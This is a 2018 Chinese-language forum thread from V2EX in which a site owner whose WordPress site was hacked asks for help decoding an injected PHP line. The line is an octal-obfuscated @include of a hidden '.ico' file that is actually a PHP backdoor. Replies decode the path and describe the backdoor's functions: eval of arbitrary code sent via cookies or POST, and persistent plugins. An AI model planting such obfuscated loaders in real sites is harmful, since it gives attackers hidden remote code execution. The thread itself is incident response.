alect
V2EX  ›  问与答

网站被黑,求解密

  •  
  •   alect · Sep 2, 2018 · 2445 views
    This topic created in 2857 days ago, the information mentioned may be changed or developed.
    <?php
    /*2baab*/

    @include "\057ho\155e/\152im\155y/\144om\141in\163/i\156ba\156gb\141ng\056co\155/p\162iv\141te\137ht\155l/\167p-\151nc\154ud\145s/\122eq\165es\164s/\103oo\153ie\057.f\070b8\144b4\141.i\143o";

    /*2baab*/
    6 replies    2018-09-02 22:45:43 +08:00
    msputup
        1
    msputup  
       Sep 2, 2018   ❤️ 2
    @include "/home/jimmy/domains/inbangbang.com/private_html/wp-includes/Requests/Cookie/.f8b8db4a.ico";

    你要看看你的 ico 这个文件,应该是一段 php 代码。
    beastk
        2
    beastk  
       Sep 2, 2018 via iPhone
    ascii ?
    alect
        3
    alect  
    OP
       Sep 2, 2018
    @msputup 感谢,真的是 php 文件

    https://pastebin.com/17mZ772D
    msputup
        4
    msputup  
       Sep 2, 2018
    @alect 这个也加密了。不太懂 php。
    des
        5
    des  
       Sep 2, 2018
    @alect
    就是木马而已,知道了也没啥用。
    建议清理了修补一下漏洞。

    PS:
    我还是仔细研究了一下,执行过程是
    通过 eval 执行
    从 $_COOKIE 或者 $_POST 获取参数,遍历每一个键值对反序列化,对比 key
    正确的话取 action,action 有四种,分别是 info、eval (执行任意代码)、添加 plugin 和删除 plugin
    plugin 的代码追加在自身文件中,plugin 里面的代码会在每次请求时执行
    嗯,这就是所有的功能了~ o(* ̄▽ ̄*)o
    zsdroid
        6
    zsdroid  
       Sep 2, 2018
    f12 了解下
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   4472 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 67ms · UTC 10:04 · PVG 18:04 · LAX 03:04 · JFK 06:04
    ♥ Do have faith in what you're doing.